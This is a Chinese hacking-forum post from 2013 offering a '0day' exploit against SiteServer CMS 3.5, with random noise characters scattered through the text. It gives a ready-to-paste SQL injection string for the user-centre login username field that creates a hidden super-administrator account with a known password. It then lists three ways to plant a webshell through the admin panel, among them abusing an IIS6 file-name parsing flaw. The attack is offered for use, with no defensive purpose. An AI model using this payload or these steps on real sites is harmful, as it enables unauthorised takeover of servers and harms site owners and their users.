找回密码
 立即注册
查看: 2663|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版& N% L- `  J% [9 Y8 w

. E! G' Z2 g8 E+ ?stieserver官网:www.siteserver.cn
/ u  x+ Y5 G3 H6 N; F. a4 x6 Z8 }' }* {; c6 ]* {

' H. n1 b! ~: J9 K; b
+ y; i$ Q4 F* F$ r& n5 Z  HEXP:
, w! e' l& l/ }7 Z( B3 P, C/ i0 Y, V1 e' H( x' a
直接访问UserCenter/login.aspx, E- b8 @* Z. {" C' j) `
8 w. T- ?: c, B3 w" o( Z
5 i' D' b; h3 Q0 [) u5 g, u8 [
( |$ i! y  t% V% r
用户名处输入:
7 w# K3 b* k" u( U
3 L2 Z. \, W7 u) \2 r123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--5 B+ G8 `; A9 k3 C2 j! q

4 `1 Z. k' ~( @# Q
3 h  j. H- |, U  d7 e4 n  y8 v% N0 K
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。  F1 U6 f, k0 u) J8 ]% m

8 t+ G6 v  n/ ?' H
- o9 Y/ I9 Z. L
6 M; y8 v2 }4 W' T3 ^1 G之后再访问后台SiteServer/login.aspx用插入的用户登陆4 d" J8 h% f3 a# ?. f

7 Y+ B2 H' m6 V# ? 6 m- Q" }7 S( v% w

) ^9 r* b4 M  `% w后台拿webshell的三种方法:
% x. \/ ^2 z! K6 \( ^3 [
  D* u( a! l9 U0 o+ K5 a" O1 n6 u2 y一、
$ U8 p' Z" P& j0 {# t* y" S; |: A  [! O. r6 \4 F/ e
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
8 ^/ [: o$ _5 W# H% ?: C0 l3 a9 ?: ?8 f! |, e% f, ~0 B8 z3 [; t
二、
% o6 h8 W& ?4 G. w
$ }& R  w$ h2 g0 O) e成员权限-》添加用户-》用户名为:1.asp8 i0 z; K5 O; O5 h& e* b/ B1 V

1 n) X2 {; \" ~" u# s7 V5 r. K. F+ K7 Mhttp://127.0.0.1/usercenter/' l( z4 j3 n) X1 {" C$ r$ h  y
. L5 q2 H0 l5 C8 p; o0 M& L
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
" _9 X7 W: Z% I. p2 q) B& H) P) U, y; k6 q7 }5 J+ B; ^
(ps:后台添加用户时不会验证是否含有非法字符)
+ J' v1 l. H, W6 N2 e/ b! Y$ ]# N9 Z: j, `6 K( R
三、
7 N6 {, L3 C" R; h
* j& {# h6 u" @, G1 g系统工具-》实用工具-》机器参数查看
: ?2 e2 f# s$ ^& D5 s, t# N4 j/ }可以看到数据库类型、名称,WEB路径, J1 u( S% s9 C4 V. }
, @0 h' U. g; s. a3 n5 O6 I0 f
系统工具-》数据库工具-》SQL语句查询+ E3 Y+ I7 u6 m7 L
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。& }/ R$ x$ X- g+ P. I
7 T3 a* l+ j' O/ m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表